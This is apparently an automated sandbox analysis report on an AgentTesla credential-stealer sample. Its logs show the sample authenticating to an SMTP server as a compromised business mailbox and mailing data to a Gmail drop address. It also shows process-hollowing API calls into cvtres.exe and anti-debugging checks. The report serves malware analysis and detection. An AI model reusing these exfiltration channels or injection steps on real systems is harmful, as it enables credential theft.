                      Jul 22, 2022 15:35:09.694714069 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:35:09.746292114 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:35:09.746540070 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:35:09.748508930 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:35:09.795516968 CEST58749741109.99.162.14192.168.2.3
                      TimestampSource PortDest PortSource IPDest IP
                      Jul 22, 2022 15:33:29.739366055 CEST5811653192.168.2.38.8.8.8
                      Jul 22, 2022 15:33:29.756978035 CEST53581168.8.8.8192.168.2.3
                      Jul 22, 2022 15:33:29.813652039 CEST5742153192.168.2.38.8.8.8
                      Jul 22, 2022 15:33:29.835345984 CEST53574218.8.8.8192.168.2.3
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Jul 22, 2022 15:33:29.739366055 CEST192.168.2.38.8.8.80x6f89Standard query (0)mail.rematinvest.roA (IP address)IN (0x0001)
                      Jul 22, 2022 15:33:29.813652039 CEST192.168.2.38.8.8.80x5dbfStandard query (0)mail.rematinvest.roA (IP address)IN (0x0001)
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Jul 22, 2022 15:33:29.756978035 CEST8.8.8.8192.168.2.30x6f89No error (0)mail.rematinvest.rorematinvest.roCNAME (Canonical name)IN (0x0001)
                      Jul 22, 2022 15:33:29.756978035 CEST8.8.8.8192.168.2.30x6f89No error (0)rematinvest.ro109.99.162.14A (IP address)IN (0x0001)
                      Jul 22, 2022 15:33:29.835345984 CEST8.8.8.8192.168.2.30x5dbfNo error (0)mail.rematinvest.rorematinvest.roCNAME (Canonical name)IN (0x0001)
                      Jul 22, 2022 15:33:29.835345984 CEST8.8.8.8192.168.2.30x5dbfNo error (0)rematinvest.ro109.99.162.14A (IP address)IN (0x0001)
                      TimestampSource PortDest PortSource IPDest IPCommands
                      Jul 22, 2022 15:33:30.007388115 CEST58749741109.99.162.14192.168.2.3220-cpanel4.romtelecom.net ESMTP Exim 4.93 #2 Fri, 22 Jul 2022 16:33:29 +0300
                      220-We do not authorize the use of this system to transport unsolicited,
                      220 and/or bulk e-mail.
                      Jul 22, 2022 15:33:30.010684013 CEST49741587192.168.2.3109.99.162.14EHLO 813848
                      Jul 22, 2022 15:33:30.056446075 CEST58749741109.99.162.14192.168.2.3250-cpanel4.romtelecom.net Hello 813848 [84.17.52.2]
                      250-SIZE 52428800
                      250-8BITMIME
                      250-PIPELINING
                      250-AUTH PLAIN LOGIN
                      250-STARTTLS
                      250 HELP
                      Jul 22, 2022 15:33:30.057645082 CEST49741587192.168.2.3109.99.162.14AUTH login ZmFjdHVyYXJlQHJlbWF0aW52ZXN0LnJv
                      Jul 22, 2022 15:33:30.105433941 CEST58749741109.99.162.14192.168.2.3334 UGFzc3dvcmQ6
                      Jul 22, 2022 15:33:30.172768116 CEST58749741109.99.162.14192.168.2.3235 Authentication succeeded
                      Jul 22, 2022 15:33:30.174324036 CEST49741587192.168.2.3109.99.162.14MAIL FROM:<facturare@rematinvest.ro>
                      Jul 22, 2022 15:33:30.219968081 CEST58749741109.99.162.14192.168.2.3250 OK
                      Jul 22, 2022 15:33:30.220487118 CEST49741587192.168.2.3109.99.162.14RCPT TO:<lsir34118@gmail.com>
                      Jul 22, 2022 15:33:30.314565897 CEST58749741109.99.162.14192.168.2.3250 Accepted
                      Jul 22, 2022 15:33:30.315073967 CEST49741587192.168.2.3109.99.162.14DATA
                      Jul 22, 2022 15:33:30.361115932 CEST58749741109.99.162.14192.168.2.3354 Enter message, ending with "." on a line by itself
                      Jul 22, 2022 15:33:30.370620966 CEST49741587192.168.2.3109.99.162.14.
                      Jul 22, 2022 15:33:34.302337885 CEST58749741109.99.162.14192.168.2.3250 OK id=1oEsmY-000QvC-Al
                      Jul 22, 2022 15:33:34.549921989 CEST58749741109.99.162.14192.168.2.3250 OK id=1oEsmY-000QvC-Al
                      Jul 22, 2022 15:35:09.694714069 CEST49741587192.168.2.3109.99.162.14QUIT
                      Jul 22, 2022 15:35:09.746292114 CEST58749741109.99.162.14192.168.2.3221 cpanel4.romtelecom.net closing connection

                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:15:33:19
                      Start date:22/07/2022
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe"
                      Imagebase:0x570000
                      File size:368792 bytes
                      MD5 hash:DC73208CEA7EFCB8980E4FE19695FB58
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.279564854.0000000004225000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.279564854.0000000004225000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.277476753.0000000003ABF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.277476753.0000000003ABF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      Target ID:1
                      Start time:15:33:21
                      Start date:22/07/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      Imagebase:0xe40000
                      File size:43176 bytes
                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.275647254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.275647254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.275934725.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.275934725.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.275297805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.275297805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.537735702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.537735702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.274776016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.274776016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.540034037.0000000007158000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Reset < >

                        Execution Graph

                        Execution Coverage:16.6%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:17.6%
                        Total number of Nodes:74
                        Total number of Limit Nodes:3
                        execution_graph 6676 10db42e 6677 10db451 6676->6677 6681 10da668 6677->6681 6685 10da660 6677->6685 6678 10db4b0 6682 10da6b4 WriteProcessMemory 6681->6682 6684 10da74d 6682->6684 6684->6678 6686 10da6b4 WriteProcessMemory 6685->6686 6688 10da74d 6686->6688 6688->6678 6741 10dbdfe 6745 10da418 6741->6745 6749 10da420 6741->6749 6742 10dbe18 6746 10da41c SetThreadContext 6745->6746 6748 10da4e1 6746->6748 6748->6742 6750 10da469 SetThreadContext 6749->6750 6752 10da4e1 6750->6752 6752->6742 6689 10da548 6690 10da58c VirtualAllocEx 6689->6690 6692 10da604 6690->6692 6753 10dc374 6757 10da328 6753->6757 6762 10da330 6753->6762 6754 10dc389 6758 10da32c 6757->6758 6759 10da2b2 6758->6759 6760 10da38d ResumeThread 6758->6760 6759->6754 6761 10da3c0 6760->6761 6761->6754 6763 10da374 ResumeThread 6762->6763 6765 10da3c0 6763->6765 6765->6754 6766 10db5d7 6767 10db612 6766->6767 6771 10da9e5 6767->6771 6775 10da9f0 6767->6775 6772 10da9e8 CreateProcessA 6771->6772 6774 10daccc 6772->6774 6776 10daa77 CreateProcessA 6775->6776 6778 10daccc 6776->6778 6693 10dbc66 6694 10dbc95 6693->6694 6696 10da668 WriteProcessMemory 6694->6696 6697 10da660 WriteProcessMemory 6694->6697 6695 10dbcf1 6696->6695 6697->6695 6698 10db820 6699 10db843 6698->6699 6703 10da7b8 6699->6703 6707 10da7c0 6699->6707 6700 10db89f 6704 10da7bc ReadProcessMemory 6703->6704 6706 10da884 6704->6706 6706->6700 6708 10da80c ReadProcessMemory 6707->6708 6710 10da884 6708->6710 6710->6700 6711 10dae80 6712 10daea2 6711->6712 6713 10daeee 6712->6713 6715 10dce68 6712->6715 6716 10dce84 6715->6716 6719 10dd3e8 6716->6719 6717 10dce99 6717->6713 6724 10dd40a 6719->6724 6720 10dd7ff 6721 10dd0b0 FindCloseChangeNotification 6720->6721 6722 10dd9a1 6721->6722 6733 10dd0b0 6722->6733 6724->6720 6724->6722 6725 10dd640 6724->6725 6726 10dd9e6 6724->6726 6729 10df028 6724->6729 6725->6717 6726->6725 6737 10df3f8 6726->6737 6730 10df071 CheckRemoteDebuggerPresent 6729->6730 6732 10df0c8 6730->6732 6732->6724 6734 10df128 FindCloseChangeNotification 6733->6734 6736 10df1b8 6734->6736 6736->6726 6738 10df43c EnumWindows 6737->6738 6740 10df4a3 6738->6740 6740->6726

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 10d3e90-10d3f72 1 10d3f74 0->1 2 10d3f76-10d3f9d 0->2 1->2 3 10d3f9f 2->3 4 10d3fa4-10d3fc1 2->4 3->4 5 10d3fc9 4->5 6 10d3fd0-10d3fec 5->6 7 10d3fee 6->7 8 10d3ff5-10d3ff6 6->8 7->5 7->8 9 10d4048-10d4076 7->9 10 10d424b-10d424f 7->10 11 10d42c5-10d42e5 7->11 12 10d4385-10d439c 7->12 13 10d4145-10d4159 7->13 14 10d4304-10d4316 7->14 15 10d40dd-10d40f4 7->15 16 10d415e-10d416a 7->16 17 10d431b-10d4332 7->17 18 10d4115-10d4119 7->18 19 10d4295-10d4299 7->19 20 10d4351-10d435d 7->20 21 10d4192-10d41a4 7->21 22 10d41a9-10d41b5 7->22 23 10d42ea-10d42ff 7->23 24 10d43a1-10d43b4 7->24 25 10d4022-10d4037 7->25 26 10d4039-10d4046 7->26 27 10d40f9-10d4110 7->27 28 10d427b-10d4290 7->28 29 10d3ffb-10d4007 7->29 30 10d407b-10d4084 7->30 31 10d41fa-10d4206 7->31 32 10d40b0-10d40bc 7->32 8->24 9->6 43 10d4251-10d4260 10->43 44 10d4262-10d4269 10->44 11->6 12->6 13->6 14->6 15->6 45 10d416c 16->45 46 10d4171-10d418d 16->46 74 10d4334 call 10d4580 17->74 75 10d4334 call 10d4590 17->75 41 10d412c-10d4133 18->41 42 10d411b-10d412a 18->42 47 10d42ac-10d42b3 19->47 48 10d429b-10d42aa 19->48 33 10d435f 20->33 34 10d4364-10d4380 20->34 21->6 51 10d41bc-10d41d2 22->51 52 10d41b7 22->52 23->6 25->6 26->6 27->6 28->6 49 10d400e-10d4020 29->49 50 10d4009 29->50 35 10d4097-10d409e 30->35 36 10d4086-10d4095 30->36 37 10d420d-10d4223 31->37 38 10d4208 31->38 39 10d40be 32->39 40 10d40c3-10d40d8 32->40 33->34 34->6 55 10d40a5-10d40ab 35->55 36->55 70 10d422a-10d4246 37->70 71 10d4225 37->71 38->37 39->40 40->6 57 10d413a-10d4140 41->57 42->57 58 10d4270-10d4276 43->58 44->58 45->46 46->6 59 10d42ba-10d42c0 47->59 48->59 49->6 50->49 67 10d41d9-10d41f5 51->67 68 10d41d4 51->68 52->51 54 10d433a-10d434c 54->6 55->6 57->6 58->6 59->6 67->6 68->67 70->6 71->70 74->54 75->54
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: <UY$h\c|
                        • API String ID: 0-3075139921
                        • Opcode ID: 46482d8d45677524155baf1973573dd14baa8838ed3d453bcfcc6b4683712c9e
                        • Instruction ID: ad1d4ff28c2fc71a0f3f0242173e4928127b73188b77e2b3aca11c4bacb0c0dc
                        • Opcode Fuzzy Hash: 46482d8d45677524155baf1973573dd14baa8838ed3d453bcfcc6b4683712c9e
                        • Instruction Fuzzy Hash: 41F17BB4E0430ADFCB04CFA5D5818AEFBB2FF99300B14949AD546AB215D734EA42CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 76 10d3f78-10d3f9d 77 10d3f9f 76->77 78 10d3fa4-10d3fc1 76->78 77->78 79 10d3fc9 78->79 80 10d3fd0-10d3fec 79->80 81 10d3fee 80->81 82 10d3ff5-10d3ff6 80->82 81->79 81->82 83 10d4048-10d4076 81->83 84 10d424b-10d424f 81->84 85 10d42c5-10d42e5 81->85 86 10d4385-10d439c 81->86 87 10d4145-10d4159 81->87 88 10d4304-10d4316 81->88 89 10d40dd-10d40f4 81->89 90 10d415e-10d416a 81->90 91 10d431b-10d4332 81->91 92 10d4115-10d4119 81->92 93 10d4295-10d4299 81->93 94 10d4351-10d435d 81->94 95 10d4192-10d41a4 81->95 96 10d41a9-10d41b5 81->96 97 10d42ea-10d42ff 81->97 98 10d43a1-10d43b4 81->98 99 10d4022-10d4037 81->99 100 10d4039-10d4046 81->100 101 10d40f9-10d4110 81->101 102 10d427b-10d4290 81->102 103 10d3ffb-10d4007 81->103 104 10d407b-10d4084 81->104 105 10d41fa-10d4206 81->105 106 10d40b0-10d40bc 81->106 82->98 83->80 117 10d4251-10d4260 84->117 118 10d4262-10d4269 84->118 85->80 86->80 87->80 88->80 89->80 119 10d416c 90->119 120 10d4171-10d418d 90->120 148 10d4334 call 10d4580 91->148 149 10d4334 call 10d4590 91->149 115 10d412c-10d4133 92->115 116 10d411b-10d412a 92->116 121 10d42ac-10d42b3 93->121 122 10d429b-10d42aa 93->122 107 10d435f 94->107 108 10d4364-10d4380 94->108 95->80 125 10d41bc-10d41d2 96->125 126 10d41b7 96->126 97->80 99->80 100->80 101->80 102->80 123 10d400e-10d4020 103->123 124 10d4009 103->124 109 10d4097-10d409e 104->109 110 10d4086-10d4095 104->110 111 10d420d-10d4223 105->111 112 10d4208 105->112 113 10d40be 106->113 114 10d40c3-10d40d8 106->114 107->108 108->80 129 10d40a5-10d40ab 109->129 110->129 144 10d422a-10d4246 111->144 145 10d4225 111->145 112->111 113->114 114->80 131 10d413a-10d4140 115->131 116->131 132 10d4270-10d4276 117->132 118->132 119->120 120->80 133 10d42ba-10d42c0 121->133 122->133 123->80 124->123 141 10d41d9-10d41f5 125->141 142 10d41d4 125->142 126->125 128 10d433a-10d434c 128->80 129->80 131->80 132->80 133->80 141->80 142->141 144->80 145->144 148->128 149->128
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: <UY$h\c|
                        • API String ID: 0-3075139921
                        • Opcode ID: f1934217aaab233a909d31ce83d51f44a7d1a3309207b02bb23fe5588346dd67
                        • Instruction ID: 5ce9011f0bc05eb93d24ef7dd2586fc0b116faf012e6b6a5d769db625bfdb64a
                        • Opcode Fuzzy Hash: f1934217aaab233a909d31ce83d51f44a7d1a3309207b02bb23fe5588346dd67
                        • Instruction Fuzzy Hash: 76D14BB4E0420ADFCB04CFA5D5858AEFBB2FF89300F14D15AD546AB218D734AA42CF95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 150 10d1de0-10d1ea3 151 10d1eaa-10d1ef6 150->151 152 10d1ea5 150->152 155 10d1ef9 151->155 152->151 156 10d1f00-10d1f1c 155->156 157 10d1f1e 156->157 158 10d1f25-10d1f26 156->158 157->155 159 10d1f2b-10d1f38 157->159 160 10d2130-10d21ae 157->160 161 10d1fa8-10d1fba 157->161 162 10d2100-10d2104 157->162 163 10d1fe2-10d2016 157->163 164 10d205c-10d2077 157->164 165 10d207c-10d20b0 157->165 166 10d1fbf-10d1fdd 157->166 167 10d1f78-10d1f7c 157->167 168 10d201b-10d202d 157->168 169 10d20b5-10d20cd 157->169 170 10d2032-10d2038 157->170 158->159 158->160 194 10d1f3b call 10d2200 159->194 195 10d1f3b call 10d2210 159->195 198 10d21b0 call 10d31bd 160->198 199 10d21b0 call 10d3cbc 160->199 200 10d21b0 call 10d3178 160->200 201 10d21b0 call 10d30a8 160->201 202 10d21b0 call 10d30b8 160->202 203 10d21b0 call 10d31ea 160->203 204 10d21b0 call 10d320a 160->204 205 10d21b0 call 10d322a 160->205 206 10d21b0 call 10d31d4 160->206 207 10d21b0 call 10d3c57 160->207 208 10d21b0 call 10d32e3 160->208 209 10d21b0 call 10d3193 160->209 161->156 173 10d2117-10d211e 162->173 174 10d2106-10d2115 162->174 163->156 164->156 165->156 166->156 171 10d1f8f-10d1f96 167->171 172 10d1f7e-10d1f8d 167->172 168->156 185 10d20cf-10d20de 169->185 186 10d20e0-10d20e7 169->186 196 10d203a call 10d26c0 170->196 197 10d203a call 10d26d0 170->197 180 10d1f9d-10d1fa3 171->180 172->180 176 10d2125-10d212b 173->176 174->176 176->156 177 10d2040-10d2057 177->156 180->156 188 10d20ee-10d20fb 185->188 186->188 187 10d1f41-10d1f76 187->156 188->156 193 10d21b6-10d21c0 194->187 195->187 196->177 197->177 198->193 199->193 200->193 201->193 202->193 203->193 204->193 205->193 206->193 207->193 208->193 209->193
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: zJs$zJs
                        • API String ID: 0-1581145645
                        • Opcode ID: 40d2e6900ba401e637a7b4cb9737953885dc53ebd62b37be5820b0763db1e926
                        • Instruction ID: a040746237ba1db9fabbf7690fd838fc73fef0e061a2ad7b0228c1502310d493
                        • Opcode Fuzzy Hash: 40d2e6900ba401e637a7b4cb9737953885dc53ebd62b37be5820b0763db1e926
                        • Instruction Fuzzy Hash: 0FC113B4E04318CFCB04CFA9D980AAEBBF2FF89314F24856AD445AB355DB359942CB14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 210 10d1e80-10d1ea3 211 10d1eaa-10d1ef6 210->211 212 10d1ea5 210->212 215 10d1ef9 211->215 212->211 216 10d1f00-10d1f1c 215->216 217 10d1f1e 216->217 218 10d1f25-10d1f26 216->218 217->215 219 10d1f2b-10d1f38 217->219 220 10d2130-10d21ae 217->220 221 10d1fa8-10d1fba 217->221 222 10d2100-10d2104 217->222 223 10d1fe2-10d2016 217->223 224 10d205c-10d2077 217->224 225 10d207c-10d20b0 217->225 226 10d1fbf-10d1fdd 217->226 227 10d1f78-10d1f7c 217->227 228 10d201b-10d202d 217->228 229 10d20b5-10d20cd 217->229 230 10d2032-10d2038 217->230 218->219 218->220 268 10d1f3b call 10d2200 219->268 269 10d1f3b call 10d2210 219->269 256 10d21b0 call 10d31bd 220->256 257 10d21b0 call 10d3cbc 220->257 258 10d21b0 call 10d3178 220->258 259 10d21b0 call 10d30a8 220->259 260 10d21b0 call 10d30b8 220->260 261 10d21b0 call 10d31ea 220->261 262 10d21b0 call 10d320a 220->262 263 10d21b0 call 10d322a 220->263 264 10d21b0 call 10d31d4 220->264 265 10d21b0 call 10d3c57 220->265 266 10d21b0 call 10d32e3 220->266 267 10d21b0 call 10d3193 220->267 221->216 233 10d2117-10d211e 222->233 234 10d2106-10d2115 222->234 223->216 224->216 225->216 226->216 231 10d1f8f-10d1f96 227->231 232 10d1f7e-10d1f8d 227->232 228->216 245 10d20cf-10d20de 229->245 246 10d20e0-10d20e7 229->246 254 10d203a call 10d26c0 230->254 255 10d203a call 10d26d0 230->255 240 10d1f9d-10d1fa3 231->240 232->240 236 10d2125-10d212b 233->236 234->236 236->216 237 10d2040-10d2057 237->216 240->216 248 10d20ee-10d20fb 245->248 246->248 247 10d1f41-10d1f76 247->216 248->216 253 10d21b6-10d21c0 254->237 255->237 256->253 257->253 258->253 259->253 260->253 261->253 262->253 263->253 264->253 265->253 266->253 267->253 268->247 269->247
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: zJs$zJs
                        • API String ID: 0-1581145645
                        • Opcode ID: c8bb5bea535315902917c03c84b6d02937efd1efe9d537bc8ab2d8254fb9f3b5
                        • Instruction ID: a4480fc1114bc25d311a5d65268bf4a14574ff87516b194154b9f3bea4403d14
                        • Opcode Fuzzy Hash: c8bb5bea535315902917c03c84b6d02937efd1efe9d537bc8ab2d8254fb9f3b5
                        • Instruction Fuzzy Hash: E7B1AEB4E042199FDB04CFA9C980AAEBBF2FF88304F20856AE515AB355DB359941CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 402 10dd3e8-10dd408 403 10dd40f-10dd45b 402->403 404 10dd40a 402->404 406 10dd51c-10dd54a call 10d9a40 call 10dd080 403->406 407 10dd461 403->407 404->403 409 10dd468-10dd484 406->409 407->409 411 10dd48d-10dd48e 409->411 412 10dd486 409->412 424 10dd779-10dd780 411->424 412->406 412->407 412->411 413 10dd66d-10dd693 call 10d9a40 call 10dd08c 412->413 414 10dd54f-10dd561 412->414 415 10dd705-10dd721 412->415 416 10dd646-10dd668 412->416 417 10dd506-10dd50d 412->417 418 10dd640-10dd641 412->418 419 10dd6e3-10dd700 call 10dd098 412->419 420 10dd763-10dd76a 412->420 421 10dd6c2-10dd6de 412->421 422 10dd57e-10dd5ab 412->422 423 10dd5f9-10dd5fe 412->423 412->424 425 10dd4f0-10dd4f7 412->425 426 10dd5b0-10dd5b7 412->426 427 10dd493 412->427 459 10dd698-10dd6bd 413->459 455 10dd9ab-10dd9e1 call 10dd0b0 414->455 456 10dd567-10dd579 414->456 453 10dd73a-10dd744 415->453 454 10dd723-10dd738 415->454 416->409 417->417 432 10dd50f-10dd517 417->432 429 10ddcee-10ddcf6 418->429 419->409 420->420 435 10dd76c-10dd774 420->435 421->429 422->409 439 10dd617-10dd621 423->439 440 10dd600-10dd615 423->440 424->424 436 10dd782-10dd7c7 call 10d9a40 call 10dd0a4 424->436 425->425 431 10dd4f9-10dd501 425->431 437 10dd5b9-10dd5ce 426->437 438 10dd5d0-10dd5da 426->438 442 10dd49e-10dd4eb call 10dd074 427->442 431->409 432->409 435->409 466 10dd7cd 436->466 467 10dd983-10dd997 436->467 450 10dd5e4-10dd5f4 437->450 438->450 451 10dd62b-10dd63b 439->451 440->451 442->409 450->409 451->409 460 10dd74e-10dd75e 453->460 454->460 498 10dd9e6-10dda19 455->498 456->409 459->409 460->409 470 10dd7d7-10dd7f6 466->470 469 10dd999-10dd9a8 call 10dd0b0 467->469 469->455 472 10dd7ff-10dd800 470->472 473 10dd7f8 470->473 472->467 473->466 473->467 473->472 474 10dd86d-10dd89d 473->474 475 10dd8ed-10dd8f4 473->475 476 10dd94f-10dd97e 473->476 477 10ddaa8-10ddaa9 473->477 478 10dd805-10dd818 call 10df028 473->478 479 10dd906-10dd90a 473->479 480 10ddb06-10ddb07 473->480 481 10dda60-10dda67 473->481 482 10dd8a2-10dd8a9 473->482 483 10dda1f 473->483 484 10dd8bb-10dd8c2 473->484 485 10dd8d4-10dd8e8 473->485 486 10dda76-10ddaa6 473->486 474->470 475->475 494 10dd8f6-10dd901 475->494 476->470 477->429 497 10dd81a-10dd828 478->497 495 10dd90c-10dd921 479->495 496 10dd923-10dd92d 479->496 480->429 481->481 492 10dda69-10dda74 481->492 482->482 491 10dd8ab-10dd8b6 482->491 490 10dda29-10dda48 483->490 484->484 493 10dd8c4-10dd8cf 484->493 485->469 486->490 500 10dda5d-10dda5e 490->500 501 10dda4a 490->501 491->470 492->490 493->470 494->470 503 10dd937-10dd94a 495->503 496->503 505 10dd82a-10dd83f 497->505 506 10dd841-10dd84b 497->506 498->483 520 10ddaae-10ddad1 call 10d9a40 call 10dd080 498->520 500->477 501->477 501->480 501->481 501->483 501->486 501->500 508 10ddb0c-10ddb13 501->508 509 10ddc08-10ddc0f 501->509 510 10ddca7-10ddce4 501->510 511 10ddb43-10ddb4a 501->511 512 10ddb82-10ddbbe call 10df3f8 501->512 513 10ddc42-10ddc49 501->513 514 10ddc58-10ddca2 call 10d9a40 call 10dd0bc 501->514 515 10ddbdb-10ddc03 501->515 516 10ddad4 501->516 517 10ddb56-10ddb7d 501->517 503->470 519 10dd855-10dd868 505->519 506->519 527 10ddb15-10ddb24 508->527 528 10ddb26-10ddb2d 508->528 521 10ddc11-10ddc20 509->521 522 10ddc22-10ddc29 509->522 511->511 518 10ddb4c-10ddb54 511->518 546 10ddbc0-10ddbd6 512->546 513->513 523 10ddc4b-10ddc53 513->523 525 10ddadb-10ddaf7 514->525 515->525 516->525 517->525 518->525 519->470 520->516 532 10ddc30-10ddc3d 521->532 522->532 523->525 535 10ddaf9 525->535 536 10ddb00-10ddb01 525->536 538 10ddb34-10ddb41 527->538 528->538 532->525 535->480 535->508 535->509 535->510 535->511 535->512 535->513 535->514 535->515 535->516 535->517 535->536 536->510 538->525 546->525
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID: Pg[9
                        • API String ID: 2591292051-2711290252
                        • Opcode ID: dd207e49df1a7790c79b6bed11b0c8ec6cd1a7dbb9badc0966c0d0d6196faaa6
                        • Instruction ID: 263f3e91281d954a1d3b672ac15764b3436d0e453e5934552436dc1682f63f0e
                        • Opcode Fuzzy Hash: dd207e49df1a7790c79b6bed11b0c8ec6cd1a7dbb9badc0966c0d0d6196faaa6
                        • Instruction Fuzzy Hash: 4A322974D05319CFDB64CFA9D9807EDBBB2BF99300F1090AAD54AA7290DB309A81CF15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 010DF0B6
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CheckDebuggerPresentRemote
                        • String ID:
                        • API String ID: 3662101638-0
                        • Opcode ID: 8262e4d58f7bc368da30903b7a351b0b1699c7d61e2ed29762b24cc21a3dc2f8
                        • Instruction ID: 01f4566bbbefd7f82b0d97b10f9cf02b1a67c21a57826dd416d08c70dcf849d5
                        • Opcode Fuzzy Hash: 8262e4d58f7bc368da30903b7a351b0b1699c7d61e2ed29762b24cc21a3dc2f8
                        • Instruction Fuzzy Hash: ED31A6B8D052189FCB10CFAAD984A9EFBF5BB49314F14942AE915B7300C774A946CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
